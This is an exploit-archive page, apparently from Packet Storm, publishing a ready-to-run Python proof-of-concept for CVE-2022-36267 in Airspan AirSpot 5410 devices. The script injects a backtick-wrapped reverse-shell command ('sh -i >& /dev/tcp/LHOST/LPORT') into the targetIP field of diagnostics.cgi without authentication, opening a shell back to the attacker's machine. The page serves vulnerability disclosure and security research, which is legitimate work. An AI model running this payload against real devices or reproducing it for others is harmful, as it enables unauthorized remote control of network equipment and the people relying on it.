what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AirSpot 5410 0.3.4.1-4 Remote Command Injection

AirSpot 5410 0.3.4.1-4 Remote Command Injection
Posted Aug 10, 2022
Authored by Samy Younsi

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

tags | exploit, remote
advisories | CVE-2022-36267
SHA-256 | 0453a46f41ec4c59c37a44bb644827c11fe0d7e8677419a16aefa00836c95383

AirSpot 5410 0.3.4.1-4 Remote Command Injection

Change Mirror Download
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
airspanLogo = """
,-.
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/||\ PWNED x_x
//||\\
// || \\
__//__||__\\__
'--------------'Necrum Security Labs

\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
url = 'https://{}:{}'.format(RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
if response.status_code != 200:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
print('[INFO] Airspan device web interface seems reachable!')
except:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
try:
print('[INFO] Executing reverse shell...')
response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
return
except Exception as e:
print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
return False

def main():
banner()
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close